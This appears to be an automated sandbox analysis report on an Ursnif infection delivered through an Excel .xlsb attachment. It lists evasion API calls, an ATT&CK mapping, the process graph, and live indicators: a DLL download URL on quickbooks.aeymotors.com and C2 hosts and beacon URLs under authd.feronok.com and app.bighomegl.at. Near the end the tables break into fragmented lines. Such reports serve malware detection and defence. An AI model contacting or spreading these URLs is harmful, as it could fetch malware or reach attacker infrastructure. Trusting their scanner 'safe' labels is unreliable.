              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
              Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6152 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\regsvr32.exe | API call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67D2DD7D _memset,IsDebuggerPresent,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67D48402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67DA7188 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67DA6CC5 push dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67DA70BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67D35139 GetProcessHeap,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67D35ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67D35EA1 SetUnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion:

              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 185.233.80.31 80
              Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: app.bighomegl.at
              Source: Yara match | File source: app.xml, type: SAMPLE
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmp | Binary or memory string: Program Manager
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmp | Binary or memory string: Progman
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CD1144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CD1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match, File source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match, File source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 2 | DLL Side-Loading 1 | Process Injection 12 | Masquerading 111 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 1 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Disable or Modify Tools 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Native API 2 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 1 | Security Account Manager | Security Software Discovery 13 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 4 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 12 | NTDS | Virtualization/Sandbox Evasion 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 2 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Regsvr32 1 | Proc Filesystem | System Information Discovery 125 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | DLL Side-Loading 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

              Behavior Graph

Behavior Graph ID: 433009, Sample: my_attach_82862.xlsb, Startdate: 11/06/2021, Architecture: WINDOWS, Score: 100
Start (node 2): DNS/IP: authd.feronok.com; signatures: Multi AV Scanner detection for domain / URL, Found malware configuration, Antivirus detection for URL or domain, 9 other signatures; started: EXCEL.EXE (27 43), iexplore.exe (2 83), iexplore.exe (1 50), 2 other processes
EXCEL.EXE (node 7): DNS/IP: quickbooks.aeymotors.com 50.87.220.158, 443, 49714 UNIFIEDLAYER-AS-1US United States; dropped: C:\Users\user\AppData\Local\...\soft[1].dll (PE32), C:\Users\Public\SettingSyncY.dll (PE32), C:\Users\user\...\~$my_attach_82862.xlsb (data); signatures: Document exploit detected (creates forbidden files), Document exploit detected (UrlDownloadToFile); started: regsvr32.exe (node 18)
iexplore.exe (node 12) started iexplore.exe 38 (node 22); iexplore.exe (node 14) started iexplore.exe 35 (node 24); 2 other processes (node 16) started iexplore.exe 35 (node 26) and iexplore.exe 35 (node 28)
regsvr32.exe (node 18): signatures: System process connects to network (likely due to code injection or exploit), Writes or reads registry keys via WMI, Writes registry values via WMI
iexplore.exe (node 22): DNS/IP: app.bighomegl.at 185.233.80.31, 49731, 49732, 49742 SUPERSERVERSDATACENTERRU Russian Federation; authd.feronok.com
iexplore.exe (node 24): DNS/IP: authd.feronok.com
iexplore.exe (node 28): DNS/IP: authd.feronok.com


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\SettingSyncY.dll | 6% | Metadefender |
C:\Users\Public\SettingSyncY.dll | 4% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll | 6% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll | 4% | ReversingLabs |

              Unpacked PE Files

Source | Detection | Scanner | Label
3.2.regsvr32.exe.3010000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

              Domains

Source | Detection | Scanner | Label
authd.feronok.com | 11% | Virustotal |
app.bighomegl.at | 7% | Virustotal |
quickbooks.aeymotors.com | 3% | Virustotal |

              URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal |
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2 | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 | 0% | Avira URL Cloud | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ | 0% | Avira URL Cloud | safe
http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/ | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe
https://quickbooks.aeymotors.com/soft.dll | 100% | Avira URL Cloud | malware
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
authd.feronok.com | 185.233.80.31 | true | true | | unknown
app.bighomegl.at | 185.233.80.31 | true | true | | unknown
quickbooks.aeymotors.com | 50.87.220.158 | true | false | | unknown

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 | true | Avira URL Cloud: safe | unknown
http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://login.microsoftonline.com/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://shell.suite.office.com:1443 | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://autodiscover-s.outlook.com/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://cdn.entity. | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://powerlift.acompli.net | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://cortana.ai | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://api.aadrm.com/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://api.microsoftstream.com/api/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://cr.office.com | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://portal.office.com/account/?ref=ClientMeControl | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
http://www.reddit.com/ | msapplication.xml4.20.dr | false | | high
https://graph.ppe.windows.net | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | Avira URL Cloud: safe | unknown
http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2 | ~DF60CBFC830128400E.TMP.36.dr, {CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat.36.dr | true | Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://store.office.cn/addinstemplate | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://globaldisco.crm.dynamics.com | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://store.officeppe.com/addinstemplate | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://web.microsoftstream.com/video/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://graph.windows.net | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://dataservice.o365filtering.com/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
http://www.youtube.com/ | msapplication.xml7.20.dr | false | | high
https://ncus.contentsync. | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
http://weather.service.msn.com/data.aspx | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false | | high
https://apis.live.net/v5.0/ | D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.dr | false |
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                              high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                  high
                                                                                                  https://management.azure.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                    high
                                                                                                    https://wus2.contentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://incidents.diagnostics.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                      high
                                                                                                      https://clients.config.office.net/user/v1.0/iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                        high
                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                          high
                                                                                                          https://o365auditrealtimeingestion.manage.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                              high
                                                                                                              https://api.office.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                high
                                                                                                                https://incidents.diagnosticssdf.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                  high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                    high
                                                                                                                    http://www.amazon.com/msapplication.xml.20.drfalse
                                                                                                                      high
                                                                                                                      https://entitlement.diagnostics.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                        high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                          high
                                                                                                                          http://www.twitter.com/msapplication.xml5.20.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                              high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocationD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                high
                                                                                                                                https://templatelogging.office.com/client/logD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://outlook.office365.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://webshell.suite.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                        high
                                                                                                                                        http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat.29.drtrue
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://management.azure.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
